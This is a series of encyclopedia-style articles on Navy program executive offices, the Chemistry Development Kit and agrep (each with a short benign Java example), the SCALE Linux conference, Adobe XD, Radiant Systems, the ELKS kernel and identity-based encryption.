The Naval Information Warfare Systems Command is organizationally aligned to the Chief of Naval Operations. As part of its mission, NAVWAR provides support, manpower, resources, and facilities to its aligned Program Executive Offices (PEOs). The Program Executive Offices are responsible for the execution of major defense acquisition programs. The PEOs are organizationally aligned to the Assistant Secretary of the Navy for Research, Development and Acquisition (ASN(RDA)). The Naval Information Warfare PEOs operate under NAVWAR policies and procedures.
There are three Naval Information Warfare Systems Program Executive Offices.
Program Executive Office Command, Control, Communications, Computers and Intelligence (PEO C4I) and Space Systems
PEO(C4I) provides the Navy and Marine Corps with affordable, integrated and interoperable Information Warfare capability.
The Program Executive Officer for PEO(C4I) is RDML Kurt J. Rothenhaus, USN, who assumed this post in May 2020.
PEO(C4I) comprises ten major program offices:
PMA-120: Battlespace Awareness and Information Operations Program
PMA-130: Information Assurance and Cyber Security Program
PMA-150: Command and Control Program
PMA-160: Tactical Networks Program
PMA-170: Communications and GPS Navigation Program
PMA-740: International C4I Integration Program
PMA-750: Carrier and Air Integration Program
PMA-760: Ship Integration Program
PMA-770: Undersea Communications and Integration Program
PMA-790: Shore and Expeditionary Integration Program
Program Executive Office for Digital and Enterprise Services (PEO Digital)
PEO(Digital) provides the Navy and Marine Corps with a portfolio of enterprise-wide information technology programs designed to enable common business processes and provide standard IT capabilities. PEO Digital is digitally transforming systems to evolve and deliver modern capabilities and technologies.
The Program Executive Officer for PEO(Digital) is Ruth Youngs Lew.
PEO Digital was established in May 2020 following the disestablishment of the Program Executive Office for Enterprise Information Systems. The PEO EIS offices relating to networks, enterprise services and digital infrastructure were transitioned to PEO Digital. The program offices relating to manpower, logistics and other business solutions were transitioned to PEO Manpower, Logistics and Business Solutions.
PEO(Digital) comprises five major program offices:
PMA-205: Naval Enterprise Network (NEN) Program
PMA-260: Special Networks and Intelligence Mission Applications (SNIMA) Program
PMA-270: Navy Commercial Cloud Services (NCCS) Program
PMA-280: Special Access Programs (SAP)
PMA-290: Enterprise IT Strategic Sourcing (EITSS) Program
Program Executive Office Manpower, Logistics and Business Solutions (PEO MLB)
PEO(MLB) provides the Navy and Marine Corps with a portfolio of information technology programs designed to enable common business processes at sea and in the field.
The Program Executive Officer for PEO(MLB) is Lesley L. Hubbard.
PEO MLB was established in May 2020 following the disestablishment of the Program Executive Office for Enterprise Information Systems. The PEO EIS offices relating to networks, enterprise services and digital infrastructure were transitioned to PEO Digital. The program offices relating to manpower, logistics and other business solutions were transitioned to PEO Manpower, Logistics and Business Solutions.
PEO(MLB) comprises five major program offices:
PMW-220: Navy Enterprise Business Solutions (Navy EBS) Program
PMW-230: Logistics Integrated Information Solutions - Marine Corps (GCSS-MC) Program
PMW-240: Sea Warrior Program
PMW-250: Enterprise Systems and Services (E2S) Program
PMW-444: Navy Maritime Maintenance Enterprise Solution (NMMES) Technical Refresh (TR) Program
See also
Marine Corps Systems Command
Naval Air Systems Command
Naval Facilities Engineering Command
Naval Information Warfare Systems Command
Naval Sea Systems Command
Naval Supply Systems Command
Footnotes
Shore commands of the United States Navy
|
4604270
|
https://en.wikipedia.org/wiki/Chemistry%20Development%20Kit
|
Chemistry Development Kit
|
The Chemistry Development Kit (CDK) is computer software, a library in the programming language Java, for chemoinformatics and bioinformatics. It is available for Windows, Linux, Unix, and macOS. It is free and open-source software distributed under the GNU Lesser General Public License (LGPL) 2.0.
History
The CDK was created by Christoph Steinbeck, Egon Willighagen and Dan Gezelter, then developers of Jmol and JChemPaint, to provide a common code base, on 27–29 September 2000 at the University of Notre Dame. The first source code release was made on 11 May 2001. Since then more than 100 people have contributed to the project, leading to a rich set of functions, as given below. Between 2004 and 2007, CDK News was the project's newsletter, of which all articles are available from a public archive. Due to an unsteady rate of contributions, the newsletter was put on hold.
Later, unit testing, code quality checking, and Javadoc validation were introduced. Rajarshi Guha developed a nightly build system, named Nightly, which is still operating at Uppsala University. In 2012, the project became supported by the InChI Trust, to encourage continued development. The library uses JNI-InChI to generate International Chemical Identifiers (InChIs).
In April 2013, John Mayfield (né May) joined the ranks of release managers of the CDK, to handle the development branch.
Library
The CDK is a library, instead of a user program. However, it has been integrated into various environments to make its functions available. CDK is currently used in several applications, including the programming language R, CDK-Taverna (a Taverna workbench plugin), Bioclipse, PaDEL, and Cinfony. Also, CDK extensions exist for Konstanz Information Miner (KNIME) and for Excel, called LICSS.
In 2008, bits of GPL-licensed code were removed from the library. While those code bits were independent from the main CDK library, and no copylefting was involved, the ChemoJava project was instantiated to reduce confusion among users.
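Because the CDK is a library rather than an end-user program, its functions are accessed through its Java API. The following minimal sketch parses a SMILES string and computes a binary fingerprint; it assumes a recent CDK 2.x release on the classpath, and the exact class and method names should be checked against the Javadoc of the version in use.

import org.openscience.cdk.fingerprint.Fingerprinter;
import org.openscience.cdk.fingerprint.IBitFingerprint;
import org.openscience.cdk.interfaces.IAtomContainer;
import org.openscience.cdk.silent.SilentChemObjectBuilder;
import org.openscience.cdk.smiles.SmilesParser;

public class CdkSketch {
    public static void main(String[] args) throws Exception {
        // Parse a SMILES string (caffeine) into a CDK atom container
        SmilesParser parser = new SmilesParser(SilentChemObjectBuilder.getInstance());
        IAtomContainer mol = parser.parseSmiles("CN1C=NC2=C1C(=O)N(C(=O)N2C)C");

        // Compute a path-based binary fingerprint, usable for similarity searching
        IBitFingerprint fp = new Fingerprinter().getBitFingerprint(mol);
        System.out.println("Atoms: " + mol.getAtomCount() + ", fingerprint bits set: " + fp.cardinality());
    }
}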
Major features
Chemoinformatics
2D molecule editor and generator
3D geometry generation
ring finding
substructure search using exact structures and a SMILES arbitrary target specification (SMARTS)-like query language
QSAR descriptor calculation
fingerprint calculation, including the ECFP and FCFP fingerprints
force field calculations
many input-output chemical file formats, including simplified molecular-input line-entry system (SMILES), Chemical Markup Language (CML), and chemical table file (MDL)
structure generators
International Chemical Identifier support, via JNI-InChI
Bioinformatics
protein active site detection
cognate ligand detection
metabolite identification
pathway databases
2D and 3D protein descriptors
General
Python wrapper; see Cinfony
Ruby wrapper
active user community
See also
Bioclipse – an Eclipse–RCP based chemo-bioinformatics workbench
Blue Obelisk
JChemPaint – Java 2D molecule editor, applet and application
Jmol – Java 3D renderer, applet and application
JOELib – Java version of Open Babel, OELib
List of free and open-source software packages
List of software for molecular mechanics modeling
References
External links
CDK Wiki – the community wiki
Planet CDK - a blog planet
CDK Google+ page
OpenScience.org
Bioinformatics software
Chemistry software for Linux
Computational chemistry software
Free chemistry software
Free software programmed in Java (programming language)
|
308939
|
https://en.wikipedia.org/wiki/Agrep
|
Agrep
|
agrep (approximate grep) is an open-source approximate string matching program, developed by Udi Manber and Sun Wu between 1988 and 1991, for use with the Unix operating system. It was later ported to OS/2, DOS, and Windows.
It selects the best-suited algorithm for the current query from a variety of the known fastest (built-in) string searching algorithms, including Manber and Wu's bitap algorithm based on Levenshtein distances.
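As an illustration of the underlying problem, the sketch below reports where a pattern matches some substring of a text within k edit errors (insertions, deletions or substitutions). It uses the classic dynamic-programming (Sellers) formulation of approximate matching rather than the bit-parallel bitap code agrep itself uses, and all names in it are illustrative.

public final class ApproxSearch {
    /** Prints end positions in text where some substring matches pattern within k edits. */
    static void search(String pattern, String text, int k) {
        int m = pattern.length();
        int[] col = new int[m + 1];
        for (int i = 0; i <= m; i++) col[i] = i;       // against empty text, i deletions are needed
        for (int j = 0; j < text.length(); j++) {
            int diag = col[0];                          // D[i-1][j-1] from the previous column
            col[0] = 0;                                 // a match may start anywhere in the text
            for (int i = 1; i <= m; i++) {
                int up = col[i];                        // D[i][j-1]
                int cost = pattern.charAt(i - 1) == text.charAt(j) ? 0 : 1;
                col[i] = Math.min(Math.min(up + 1, col[i - 1] + 1), diag + cost);
                diag = up;
            }
            if (col[m] <= k)
                System.out.println("match ending at index " + j + " with " + col[m] + " error(s)");
        }
    }

    public static void main(String[] args) {
        search("homogenous", "a homogeneous mixture", 2);  // tolerates the extra 'e' in the text
    }
}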
agrep is also the search engine in the indexer program GLIMPSE. agrep is under a free ISC License.
Alternative implementations
A more recent agrep is the command-line tool provided with the TRE regular expression library. TRE agrep is more powerful than Wu-Manber agrep since it allows weights and total costs to be assigned separately to individual groups in the pattern. It can also handle Unicode. Unlike Wu-Manber agrep, TRE agrep is licensed under a 2-clause BSD-like license.
FREJ (Fuzzy Regular Expressions for Java) is an open-source library that provides a command-line interface which can be used in a way similar to agrep. Unlike agrep or TRE, it can be used for constructing complex substitutions for matched text. However, its syntax and matching abilities differ significantly from those of ordinary regular expressions.
See also
Bitap algorithm
TRE (computing)
References
External links
Wu-Manber agrep
AGREP home page
For Unix (To compile under OSX 10.8, add -Wno-return-type to the CFLAGs = -O line in the Makefile)
See also
TRE regexp matching package
cgrep a defunct command line approximate string matching tool
nrgrep a command line approximate string matching tool
agrep as implemented in R
Information retrieval systems
Unix text processing utilities
Software using the ISC license
|
8769086
|
https://en.wikipedia.org/wiki/Southern%20California%20Linux%20Expo
|
Southern California Linux Expo
|
The Southern California Linux Expo (SCALE) is an annual Linux, open source and free software conference held in Los Angeles, California, since 2002. Despite having Linux in its name, SCALE covers all open source operating systems and software. It is a volunteer-run event.
The event features an expo floor with both commercial and non-profit exhibitors, as well as 4 days of seminars on the topic of Linux and Open Source software. Sessions and presentations cover a broad spectrum of topics and technical levels.
SCALE grew out of a series of LUGFests put on by the Simi Conejo Linux Users Group in the late 90s. There were four of them, held every 6 months at the Nortel development facility in Simi Valley, California. They ended when Nortel closed that facility in 2001. Subsequently, members from SCLUG, USCLUG and UCLALUG organized to create a more regional event, which they named the Southern California Linux Expo.
Companies, organizations and projects represented at SCALE include Linux-based projects such as Debian, Gentoo Linux, the Fedora Project, KDE and GNOME, other open-source operating systems including NetBSD and FreeBSD, software projects such as Django, open-source database systems such as MySQL and PostgreSQL, other open-source applications such as Drupal, Inkscape, MythTV and The Document Foundation, activist organizations such as Software Freedom Law Center and the Electronic Frontier Foundation, major technology companies such as IBM, HP and Sharp, web companies including Google, Facebook and eHarmony, and internet projects including OpenStreetMap.
Locations and dates
External links
Southern California Linux Expo - Official Website
Interview: Organizing SCALE with Free Software
Interview with SCALE organizers
Gaining Ground and Growing: SCALE 9x
SCALE 9X Across the Snowy Horizon
Linux conferences
Linux user groups
Free-software events
Recurring events established in 2002
2002 establishments in California
|
50152037
|
https://en.wikipedia.org/wiki/Adobe%20XD
|
Adobe XD
|
Adobe XD (also known as Adobe Experience Design) is a vector-based user experience design tool for web apps and mobile apps, developed and published by Adobe Inc. It is available for macOS and Windows, although there are versions for iOS and Android to help preview the result of work directly on mobile devices. Adobe XD enables website wireframing and creating click-through prototypes.
History
Adobe first announced that they were developing a new interface design and prototyping tool under the name "Project Comet" at the Adobe MAX conference in October 2015. This was in response to the rising popularity of Sketch, a UX and UI design-focused vector editor, released in 2010.
The first public beta was released for macOS as "Adobe Experience Design CC" to anyone with an Adobe account, on March 14, 2016. A beta of Adobe XD was released for Windows 10 on December 13, 2016. On October 18, 2017, Adobe announced that Adobe XD was out of beta.
Features
Adobe XD creates user interfaces for mobile and web apps. Many features in XD were previously either hard to use or nonexistent in other Adobe applications like Illustrator or Photoshop.
Repeat grid
Helps create a grid of repeating items, such as lists and photo galleries.
Prototype and animation
Creates animated prototypes through linking artboards. These prototypes can be previewed on supported mobile devices.
Interoperability
XD supports and can open files from Illustrator, Photoshop, Photoshop Sketch, and After Effects. In addition to the Adobe Creative Cloud, XD can also connect to other tools and services, such as Slack and Microsoft Teams, to collaborate. XD documents can also be moved between macOS and Windows, adjusting automatically. For security, prototypes can be shared with password protection to control access.
Content-Aware Layout
Content-Aware Layout aligns and evenly spaces objects as they are added, removed, or resized, allowing components to be designed and edited without manual nudging; adjustments can then be made with smart controls.
Voice design
Apps can be designed to respond to voice commands. In addition, what users create for smart assistants can be previewed as well.
Components
Users can create components to create logos, buttons, and other assets for reuse. Their appearance can change with the context where they are used.
Responsive resize
Responsive resize automatically adjusts and resizes pictures and other objects on the artboards. This allows content to adapt automatically to different screen sizes on platforms such as mobile phones and PCs.
Plugins
XD is compatible with custom plugins that add additional features and uses. Plugins range from design to functionality, automation and animation.
Design Education
Adobe offers educational articles, videos and live streams through various mediums to help designers learn Adobe XD and best practices.
Adobe XD Learn Hub
Launched in 2021, the Learn Hub is a resource for learning and exploring everything that Adobe XD offers – from the Getting Started series for beginners to advanced tips & tricks for designers looking to level up.
Adobe Live
With sessions just about every day of the week, Adobe Live – hosted on Behance – delivers online training for a variety of applications, including Photoshop, Illustrator, Adobe XD, and more.
Adobe MAX
Every year, Adobe MAX brings the creative community together with over 350 sessions, hands-on labs, luminary speakers and more. What was previously an in-person event has since transitioned online.
Alternatives
Sketch
Figma
Balsamiq Wireframes
icons8 Lunacy
References
External links
Adobe software
User interface builders
Web development software
|
17216329
|
https://en.wikipedia.org/wiki/Radiant%20Systems
|
Radiant Systems
|
Radiant Systems was a provider of technology to the hospitality and retail industries that was acquired by NCR Corporation in 2011. Radiant was based in Atlanta, Georgia. In its last financial report as a public company, Radiant reported revenues of $90 million and net income of $14 million in the six months ended 30 June 2011. At the time of its acquisition, Radiant employed over 1,300 people worldwide. Radiant had offices in North America, Europe, Asia and Australia.
Acquisitions
In May 1997, Radiant completed the joint acquisition of ReMACS, Inc., based in Pleasanton, CA, and Twenty/20 Visual Systems, based in Dallas, Texas. At this time, these acquisitions formed the core of Radiant Hospitality Systems, with 8,000 installed sites.
In October 1997, Radiant completed the acquisition of RapidFire Software, based in Hillsboro, OR, to expand its position in the Hospitality POS market.
In November 1997, Radiant completed the acquisition of Logic Shop, Inc., based in Atlanta, GA. Logic Shop was a provider of management software to automotive service centers.
In March 2000, Microsoft made an equity investment in Radiant Systems to assist with the development and marketing of an integrated Web-enabled management system and supply chain solution to enable retailers to conduct business-to-business e-commerce over the Internet (BlueCube).
In May 2001, Radiant bought Breeze Software, an Australian provider of point-of-sale and management systems solutions to retailers in the petroleum/convenience store industry.
In January 2004, Radiant sold its enterprise software business, now known as BlueCube Software, to Erez Goren, the company's former Co-Chairman of the Board and Co-Chief Executive Officer. Radiant retained the right to sell and market the Enterprise Productivity Suite, including functionality such as workforce and supply chain management, through a reseller agreement with BlueCube Software.
Also in 2004, Radiant bought Aloha Technologies, a provider of point of sale systems for the hospitality industry, located in Dallas, Texas, and E-Needs, the leading provider of Film Management software and services in the North American exhibition industry, based in Irvine, California.
In October 2005, Radiant acquired MenuLink Computer Solutions, Inc., an independent supplier of back-office software for the hospitality industry, located in Huntington Beach, California.
In January 2006, Radiant acquired substantially all of the assets of Synchronics, Inc., a provider of business management and point of sale software for the retail market, located in Memphis, Tennessee.
In December 2007, Radiant announced it had entered into an agreement to acquire Quest Retail Technology, a provider of point of sale (POS) and back office solutions to stadiums, arenas, convention centers, race courses, theme parks, restaurants, bars and clubs.
In April 2008, Radiant acquired Hospitality EPoS Systems, a technology supplier to the U.K. hospitality market since 1992.
In May 2008, Radiant also acquired Jadeon, Inc., one of Radiant's resellers located in California. The company reports the operations of Hospitality EPoS Systems and Jadeon under the Hospitality segment.
In July 2008, Radiant acquired Orderman GmbH, which develops wireless handheld ordering and payment devices for the hospitality industry. Orderman is headquartered in Salzburg, Austria.
In July 2011, NCR Corporation announced plans to acquire Radiant Systems for US$1.2 billion.
In August 2011, Radiant acquired Texas Digital Systems, Inc., a leader in order confirmation displays and digital signage solutions.
On 22 August 2011, Radiant announced the completion of the tender offer by NCR Corporation.
On 24 August 2011, NCR Corporation completed the acquisition of Radiant Systems.
References
Point of sale companies
Companies formerly listed on the Nasdaq
NCR Corporation
American companies established in 1985
2011 mergers and acquisitions
Manufacturing companies based in Atlanta
Defunct manufacturing companies based in Georgia (U.S. state)
|
7962372
|
https://en.wikipedia.org/wiki/Embeddable%20Linux%20Kernel%20Subset
|
Embeddable Linux Kernel Subset
|
The Embeddable Linux Kernel Subset (ELKS), formerly known as Linux-8086, is a Linux-like operating system kernel. It is a subset of the Linux kernel, intended for 16-bit computers with limited processor and memory resources such as machines powered by Intel 8086 and compatible microprocessors not supported by 32-bit Linux.
Features and compatibility
ELKS is free software and available under the GNU General Public License (GPL). It can run on early 16-bit x86 computers (8088, 8086) such as IBM PC compatible systems, as well as later 32-bit x86 models operating in real mode. Another useful area is single-board microcomputers, intended as educational tools for "homebrew" projects (hardware hacking), as well as embedded controller systems (e.g. automation).
Early versions of ELKS also ran on Psion 3a and 3aR SIBO (SIxteen Bit Organiser) PDAs with NEC V30 CPUs, providing another possible field of operation (gadget hardware), if ported to such a platform. This effort was called ELKSibo. Due to lack of interest, SIBO support was removed from version 0.4.0.
Native ELKS programs may run emulated with Elksemu, allowing 8086 code to be used under Linux-i386. An effort to provide ELKS with an Eiffel compliant library also exists.
History
Development of Linux-8086 started in 1995 by Linux kernel developers Alan Cox and Chad Page as a fork of the standard Linux. By early 1996 the project was renamed ELKS (Embeddable Linux Kernel Subset), and in 1997 the first website, www.elks.ecs.soton.ac.uk/ (now offline), was created. ELKS version 0.0.63 followed on August 8 that same year. On June 22, 1999, ELKS release 0.0.77 was available, the first version able to run a graphical user interface (the Nano-X Window System). On July 21, ELKS booted on a Psion PDA with SIBO architecture. ELKS 0.0.82 came out on January 10, 2000. By including the SIBO port, it became the first official version running on other computer hardware than the original 8086 base. On March 3 that year, the project was registered on SourceForge, the new website being elks.sourceforge.net.
On January 6, 2001, Cox declared ELKS "basically dead". Nonetheless, release 0.0.84 came along on June 17, 2001, Charilaos (Harry) Kalogirou added TCP/IP networking support seven days later, and in the same year ELKS reached 0.0.90 on November 17. On April 20, 2002, Kalogirou added memory management with disk swapping capability, followed nine days later by ELKS release 0.1.0, considered the first beta version. By the end of the year, on December 18, the EDE (Elks Distribution Edition, a distribution based on the ELKS kernel) was released, itself at version 0.0.5. January 6, 2003, brought ELKS 0.1.2; an update to 0.1.3 followed on May 3, 2006, the first official release after a long hiatus in development.
A development into FlightLinux, a real-time operating system for spacecraft, was planned, but the project it was intended for (UoSAT-12) eventually settled on the qCF operating system from Quadron Corporation instead.
Current status and usage
Since January 2012 ELKS is again under development. The CVS repository was migrated to Git in February 2012, and numerous patches from the Linux-8086 mailing list were committed to the new repository. Version 0.1.4 came out on February 19, 2012, released by Jody Bruchon in memory of Riley Williams, a former co-developer. It included updated floppy disk images, fixing compilation bugs of the previous version and removing unused code. On May 10, 2012, BusyELKS was added to the repository by Jody Bruchon in an attempt to replace stand-alone binaries and to take advantage of shared code (ELKS does not support shared libraries). Like BusyBox, it saves space by combining separate programs into one larger binary, eliminating redundant chunks of code, with the individual tools invoked through symbolic links. On November 14, 2013, project development moved to GitHub. Rudimentary Ethernet and FAT support were added in 2017.
More than 35 developers have contributed to this project since the fork in 1995. As of March 2015, development of the ELKS project was again active, reaching a milestone 1,000 source code commits on March 8, 2015. As of June 2018, many bug fixes and improvements were performed with 583 more commits, leading to the 0.2.1 release. In March 2019, the project completed its transition from the obsolete BCC compiler to the more recent GCC-IA16, and development activity increased as Gregory Haerr took the helm as lead developer. During 2019 and 2020 ELKS moved from a 'bootable, unstable' status to a stable Linux-like system for small machines with Ethernet, TCP/IP, FAT16/32, multiuser serial and many more functions. As ELKS 0.4.0 was released in November 2020, the number of commits had passed 3,000.
Building on the foundation created by 0.4.0, development activity continued during 2021, still with Gregory Haerr as lead developer, supported by five active contributors. The team delivered 220 commits from October 2021 to the 0.5.0 release on February 8, 2022.
Version 0.4.0
Version 0.4.0 represented a major milestone for ELKS, lifting the system from experimental to useful for non-developers, and included the following major enhancements:
Documentation Wiki
Major kernel enhancements – size, stability, robustness, speed, system calls and debugging features.
Reliable TCP/IP stack implemented as a user mode process, supporting TCP, ICMP, ARP.
User level networking support for telnet/telnetd and file transfer.
Serial IP and Ethernet (NE1K/NE2K/WD8003) support.
Many new and updated user level commands, including ash and sash shells.
Many cross development tool-chain enhancements supporting more memory models, easing porting of more applications.
Robust FAT16/32 and Minix1 file system support, including booting from /root on FAT file systems.
Improved console and serial support: Serial console, high speed multiple serial I/O.
MBR support, boot options via /bootopts.
Updated menu-system for configuration and building on Linux and MacOS, allowing non-developers to build custom images for floppies ranging from 360KB to 2.88MB.
Version 0.5.0
Version 0.5.0 was another significant milestone for ELKS, with a number of important improvements, additions and support for two new platforms – the Japanese PC-98 and the 8018X. Enhancements included:
Kernel and network debugging tools, toolchain improvements, cleanups to ease porting to new platforms
Network stack stability and performance improvements
Native ftp/ftpd programs, expanding network application level protocol support to telnet, ftp, http and raw tcp (netcat)
Improved runtime configuration via the /bootopts configuration file
XMS-support for 386 and 286 systems, enabling high memory buffers
New SSD driver
Support for compressed executables
Support for very low memory environments (256k)
Library and system call enhancements
Kernel support for variable sector sizes (for PC-98 platform)
New startup configuration files for networking and mass storage
Improved networking support when running in QEMU
As of version 0.5.0 ELKS is a complete small-Linux system and a versatile tool for testing, diagnosing and running vintage PCs with limited resources. The improved portability demonstrated by the addition of new platforms, paves way for increased development activity towards the next version.
See also
IBM Personal Computer
TinyLinux
ucLinux
FUZIX, a Linux-like for 8-bit architectures
References
External links
Linux kernel
Monolithic kernels
Embedded Linux
Lightweight Unix-like systems
|
385892
|
https://en.wikipedia.org/wiki/Identity-based%20encryption
|
Identity-based encryption
|
ID-based encryption, or identity-based encryption (IBE), is an important primitive of ID-based cryptography. As such it is a type of public-key encryption in which the public key of a user is some unique information about the identity of the user (e.g. a user's email address). This means that a sender who has access to the public parameters of the system can encrypt a message using e.g. the text-value of the receiver's name or email address as a key. The receiver obtains its decryption key from a central authority, which needs to be trusted as it generates secret keys for every user.
ID-based encryption was proposed by Adi Shamir in 1984. However, he was only able to give an instantiation of identity-based signatures; identity-based encryption remained an open problem for many years.
The pairing-based Boneh–Franklin scheme and Cocks's encryption scheme based on quadratic residues both solved the IBE problem in 2001.
Usage
Identity-based systems allow any party to generate a public key from a known identity value such as an ASCII string. A trusted third party, called the Private Key Generator (PKG), generates the corresponding private keys. To operate, the PKG first publishes a master public key, and retains the corresponding master private key (referred to as master key). Given the master public key, any party can compute a public key corresponding to the identity by combining the master public key with the identity value. To obtain a corresponding private key, the party authorized to use the identity ID contacts the PKG, which uses the master private key to generate the private key for identity ID.
As a result, parties may encrypt messages (or verify signatures) with no prior distribution of keys between individual participants. This is extremely useful in cases where pre-distribution of authenticated keys is inconvenient or infeasible due to technical constraints. However, to decrypt or sign messages, the authorized user must obtain the appropriate private key from the PKG. A caveat of this approach is that the PKG must be highly trusted, as it is capable of generating any user's private key and may therefore decrypt (or sign) messages without authorization. Because any user's private key can be generated through the use of the third party's secret, this system has inherent key escrow. A number of variant systems have been proposed which remove the escrow, including certificate-based encryption, secure key issuing cryptography and certificateless cryptography.
Protocol framework
Dan Boneh and Matthew K. Franklin defined a set of four algorithms that form a complete IBE system:
Setup: This algorithm is run by the PKG one time for creating the whole IBE environment. The master key is kept secret and used to derive users' private keys, while the system parameters are made public. It accepts a security parameter k (i.e. the binary length of key material) and outputs:
A set of system parameters P, including the message space M and the ciphertext space C,
a master key K_m.
Extract: This algorithm is run by the PKG when a user requests his private key. Note that the verification of the authenticity of the requestor and the secure transport of the private key d are problems with which IBE protocols do not try to deal. It takes as input P, K_m and an identifier ID and returns the private key d for user ID.
Encrypt: Takes P, a message m in M and an identifier ID, and outputs the ciphertext c in C.
Decrypt: Accepts P, the private key d and the ciphertext c, and returns the message m.
Correctness constraint
In order for the whole system to work, one has to postulate that, for every message m in the message space M and every identity ID:

Decrypt(P, Extract(P, K_m, ID), Encrypt(P, m, ID)) = m
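To make the framework concrete, the following is a minimal Python sketch of the four-algorithm interface together with a generic check of the correctness constraint. It is an illustration only and is not taken from any particular paper or library: the class and method names are hypothetical, and a concrete scheme would have to supply the actual cryptography behind each method.

# Sketch of the four-algorithm IBE interface (illustrative only).
from abc import ABC, abstractmethod
from typing import Any, Tuple

class IBEScheme(ABC):
    @abstractmethod
    def setup(self, security_parameter: int) -> Tuple[Any, Any]:
        """PKG, run once: return (public system parameters P, master key K_m)."""

    @abstractmethod
    def extract(self, params: Any, master_key: Any, identity: str) -> Any:
        """PKG, per request: derive the private key d for the given identity."""

    @abstractmethod
    def encrypt(self, params: Any, message: bytes, identity: str) -> Any:
        """Sender: encrypt using only the public parameters and the identity string."""

    @abstractmethod
    def decrypt(self, params: Any, private_key: Any, ciphertext: Any) -> bytes:
        """Receiver: decrypt with the private key obtained from the PKG."""

def satisfies_correctness(scheme: IBEScheme, message: bytes, identity: str) -> bool:
    # Checks Decrypt(P, Extract(P, K_m, ID), Encrypt(P, m, ID)) == m for one sample.
    params, master_key = scheme.setup(security_parameter=128)
    private_key = scheme.extract(params, master_key, identity)
    ciphertext = scheme.encrypt(params, message, identity)
    return scheme.decrypt(params, private_key, ciphertext) == message

Any candidate instantiation can then be sanity-checked by calling satisfies_correctness with a sample message and identity.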
Encryption schemes
The most efficient identity-based encryption schemes are currently based on bilinear pairings on elliptic curves, such as the Weil or Tate pairings. The first of these schemes was developed by Dan Boneh and Matthew K. Franklin (2001), and performs probabilistic encryption of arbitrary plaintexts using an ElGamal-like approach. Though the Boneh–Franklin scheme is provably secure, the security proof rests on relatively new assumptions about the hardness of problems in certain elliptic curve groups.
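The overall shape of the Boneh–Franklin construction (its "BasicIdent" variant) can be sketched as follows. This is a structural illustration only, under loudly stated assumptions: the pair() function below is a deliberately insecure stand-in in which source-group "points" are just integers (their own discrete logarithms), used solely so that the Setup, Extract, Encrypt and Decrypt flow is runnable; a real implementation would use Weil or Tate pairings on elliptic curves via a pairing library.

# Structural sketch of Boneh-Franklin "BasicIdent" over a toy bilinear map.
import hashlib, secrets

P_MOD = 2**127 - 1      # prime modulus of the toy target group (not secure)
Q_ORD = P_MOD - 1       # exponents are taken modulo the group order
G = 3                   # assumed generator of the toy target group

def pair(a, b):
    # Toy "bilinear map" e(a, b) = G^(a*b): bilinear, but trivially breakable.
    return pow(G, (a * b) % Q_ORD, P_MOD)

def H1(identity: str) -> int:
    # Hash an identity string to a source-group element Q_ID.
    return int.from_bytes(hashlib.sha256(identity.encode()).digest(), "big") % Q_ORD

def H2(gt_element: int, n: int) -> bytes:
    # Hash a target-group element to an n-byte mask.
    return hashlib.shake_256(str(gt_element).encode()).digest(n)

def setup():
    s = secrets.randbelow(Q_ORD)                  # master secret
    P = 1                                         # "generator" of the toy source group
    return {"P": P, "P_pub": (s * P) % Q_ORD}, s

def extract(params, master_key, identity):
    return (master_key * H1(identity)) % Q_ORD    # private key d_ID = s * Q_ID

def encrypt(params, message: bytes, identity):
    r = secrets.randbelow(Q_ORD)
    U = (r * params["P"]) % Q_ORD                 # U = r * P
    g_id = pair(H1(identity), params["P_pub"])    # e(Q_ID, P_pub)
    mask = H2(pow(g_id, r, P_MOD), len(message))  # H2(e(Q_ID, P_pub)^r)
    return U, bytes(m ^ k for m, k in zip(message, mask))

def decrypt(params, d_id, ciphertext):
    U, V = ciphertext
    mask = H2(pair(d_id, U), len(V))              # H2(e(d_ID, U))
    return bytes(c ^ k for c, k in zip(V, mask))

params, master = setup()
ct = encrypt(params, b"hello", "bob@example.com")
assert decrypt(params, extract(params, master, "bob@example.com"), ct) == b"hello"

The real scheme obtains its security from the bilinear Diffie–Hellman assumption in pairing-friendly elliptic curve groups; the toy map above deliberately sacrifices that hardness so the sketch stays self-contained.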
Another approach to identity-based encryption was proposed by Clifford Cocks in 2001. The Cocks IBE scheme is based on well-studied assumptions (the quadratic residuosity assumption) but encrypts messages one bit at a time with a high degree of ciphertext expansion. Thus it is highly inefficient and impractical for sending all but the shortest messages, such as a session key for use with a symmetric cipher.
A third approach to IBE is through the use of lattices.
Identity-based encryption algorithms
The following is a list of practical identity-based encryption algorithms:
Boneh–Franklin (BF-IBE).
Sakai–Kasahara (SK-IBE).
Boneh–Boyen (BB-IBE).
All these algorithms have security proofs.
Advantages
One of the major advantages of any identity-based encryption scheme is that, if there is only a finite number of users, the third party's secret can be destroyed once every user has been issued a key. This can take place because this system assumes that, once issued, keys are always valid (as this basic system lacks a method of key revocation). The majority of derivatives of this system which have key revocation lose this advantage.
Moreover, as public keys are derived from identifiers, IBE eliminates the need for a public key distribution infrastructure. The authenticity of the public keys is guaranteed implicitly as long as the transport of the private keys to the corresponding user is kept secure (authenticity, integrity, confidentiality).
Apart from these aspects, IBE offers interesting features arising from the possibility of encoding additional information into the identifier. For instance, a sender might specify an expiration date for a message by appending a timestamp to the actual recipient's identity (possibly using some binary format like X.509). When the receiver contacts the PKG to retrieve the private key for this public key, the PKG can evaluate the identifier and decline the extraction if the expiration date has passed. Generally, embedding data in the ID corresponds to opening an additional channel between sender and PKG, with authenticity guaranteed through the dependency of the private key on the identifier. A hypothetical encoding of this idea is sketched below.
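As an illustration, the combined identifier can simply be the recipient's address concatenated with an expiration date before the public key is derived from it. The "||" separator and ISO date format in this Python sketch are an assumed convention for illustration, not one prescribed by any IBE standard.

# Hypothetical convention for embedding an expiration date in an IBE identity.
from datetime import date

def identity_with_expiry(recipient: str, expires: date) -> str:
    # The sender derives the public key from this combined string; the PKG
    # should refuse to extract the matching private key once `expires` has passed.
    return f"{recipient}||{expires.isoformat()}"

print(identity_with_expiry("bob@example.com", date(2030, 12, 31)))
# prints: bob@example.com||2030-12-31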
Drawbacks
If a Private Key Generator (PKG) is compromised, all messages protected over the entire lifetime of the public-private key pair used by that server are also compromised. This makes the PKG a high-value target to adversaries. To limit the exposure due to a compromised server, the master private-public key pair could be updated with a new independent key pair. However, this introduces a key-management problem where all users must have the most recent public key for the server.
Because the Private Key Generator (PKG) generates private keys for users, it may decrypt and/or sign any message without authorization. This implies that identity-based systems cannot be used for non-repudiation. This may not be an issue for organizations that host their own PKG, are willing to trust their system administrators, and do not require non-repudiation.
